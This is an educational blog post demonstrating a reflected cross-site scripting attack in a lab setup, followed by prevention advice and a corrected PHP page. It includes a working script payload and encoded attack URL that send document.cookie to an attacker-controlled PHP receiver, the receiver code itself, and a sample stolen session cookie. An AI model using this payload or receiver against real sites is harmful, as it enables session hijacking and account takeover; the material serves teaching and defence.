A simple demonstration of an XSS (cross-site scripting) attack process
Most people already understand the basic principle of XSS, so it is not repeated here. This post only walks through one complete example to show the principle in action.
1 Roles
Vulnerable website (the XSS hole): IP address 172.16.35.135, developed in PHP.
Victim visitor: IP address 172.16.35.220, browser IE11.
Hacker's data-receiving website: IP address 172.16.2.192, developed in PHP.
2 Source code
2.1 Vulnerable website
Vulnerable URL: http://172.16.35.135/xss_demo.php
<?php session_start(); ?>
<!doctype html>
This page writes the form data the user submits via GET straight into the returned HTML stream without any processing. That is where the XSS vulnerability lies.
2.2 Hacker's receiving website
Receiving URL: http://172.16.2.192/xss_hacker.php
<?php
$victim = 'xss cookie:' . $_SERVER['REMOTE_ADDR'] . ':' . $_GET['cookie'];
file_put_contents('xss_victim.txt', $victim);
It writes the visitor's IP address and the cookie the visitor uses on the vulnerable website into the file xss_victim.txt for later use.
2.3 Normal user access
Access the website with IE11. The website stores the user's login state with session + cookie: it checks the cookie to decide whether the user is valid and logged in, so the cookie is the user's sensitive data.
3 Attack process
3.1 The hacker prepares the attack string and constructs the attack URL
Hackers use a variety of scanning tools, or manual probing, to find the URLs of websites with XSS vulnerabilities, and then carefully construct attack strings. In this example the constructed string is:
"/><script>window.open("http://172.16.2.192/xss_hacker.php?cookie="+document.cookie);</script><!--
Entering this string as the value in the vulnerable website's text box and submitting it is enough to trigger the attack. Enter the string manually and submit it; the browser address bar then shows the generated attack URL. For example:
The HTML returned by the vulnerable website is now altered:
<!doctype html>
Obviously, this HTML is returned to the browser and executes a script that sends the user's cookie to the hacker's receiving website.
The final attack URL is:
http://172.16.35.135/xss_demo.php?address1=%22%2F%3E+%3Cscript%3Ewindow.open%28%22http%3A%2F%2F172.16.2.192%2Fxss_hacker.php%3Fcookie%3D%22%2Bdocument.cookie%29%3B%3C%2Fscript%3E%3C%21--
The next step is to find a victim and entice him to click the URL above.
3.2 The user mistakenly clicks the attack URL
Hackers can spread the attack URL by various means, such as sending emails or posting it on forums, for example behind an attractive link like the following.
Nothing draws the idle browser like a pretty face. Driven by curiosity, he clicks the picture, and the result of the click is a visit to the attack URL above.
3.3 Sensitive user data is sent to the hacker's receiving website
After the victim visits the attack URL, the sensitive data is automatically sent to the hacker's receiving website, which saves it to a file. In reality it would of course be stored in a database.
xss_victim.txt now holds the victim's sensitive data:
Cookie obtained by XSS: 172.16.35.220:PHPSESSID=4duu55hgci1leee4os6101cl30
Note that the XSS filter is enabled by default in IE11, and IE blocks the simple attack script above. To simulate the attack, we temporarily disabled the XSS filter.
3.4 The hacker uses the sensitive data to do bad things
With the victim's sensitive data, the hacker can do all sorts of bad things, such as logging on to the website as the victim.
4 XSS prevention
XSS prevention can be approached from several directions:
(1) As described above, the browser itself can recognise simple XSS attack strings and block simple XSS attacks;
(2) Fundamentally, the solution is to eliminate the XSS vulnerability in the website itself, which requires developers to keep security in mind and, among other measures, escape special characters before writing user input into HTML;
(3) Ordinary Internet users should resist temptation as much as possible and not click links to unfamiliar websites.
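The escaping from point (2), applied to the vulnerable page from section 2.1, as an added example that is not the post's own code: a version of xss_demo.php that reflects the input safely and also keeps the session cookie out of document.cookie. The parameter name address1 comes from the post's attack URL; the form layout and the cookie settings are assumptions.

```php
<?php
// Added example, not the post's own code: xss_demo.php with the hole closed.
// "address1" is the parameter name from the post's attack URL; the form
// layout and the cookie settings below are assumptions.

// Defence 1: an HttpOnly session cookie. document.cookie cannot read it,
// so the post's payload would exfiltrate an empty string even if some
// other injection slipped through. (Add session.cookie_secure=1 once the
// site is served over HTTPS.)
ini_set('session.cookie_httponly', '1');
ini_set('session.cookie_samesite', 'Lax'); // PHP 7.3+
session_start();

// Defence 2: escape untrusted input for the HTML context it lands in.
// With ENT_QUOTES the payload's leading quote, the "/>" that closes the
// tag and the <script> element all become inert entities:
//   "/><script>window.open(...)</script><!--
// is emitted as
//   &quot;/&gt;&lt;script&gt;window.open(...)&lt;/script&gt;&lt;!--
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Accept only a plain string; address1[]=... would otherwise arrive as an array.
$address1 = is_string($_GET['address1'] ?? null) ? $_GET['address1'] : '';
?>
<!doctype html>
<html>
<head><meta charset="utf-8"><title>xss_demo (fixed)</title></head>
<body>
<form method="get" action="xss_demo.php">
  <label>Address:
    <!-- the value sits inside a double-quoted attribute: quotes must be escaped -->
    <input type="text" name="address1" value="<?= e($address1) ?>">
  </label>
  <input type="submit" value="Submit">
</form>
<!-- the same rule applies to the text node that echoes the input back -->
<p>You entered: <?= e($address1) ?></p>
</body>
</html>
```

With this page in place, submitting the attack string from section 3.1 just displays it as literal text, and the receiving site's xss_victim.txt stays empty.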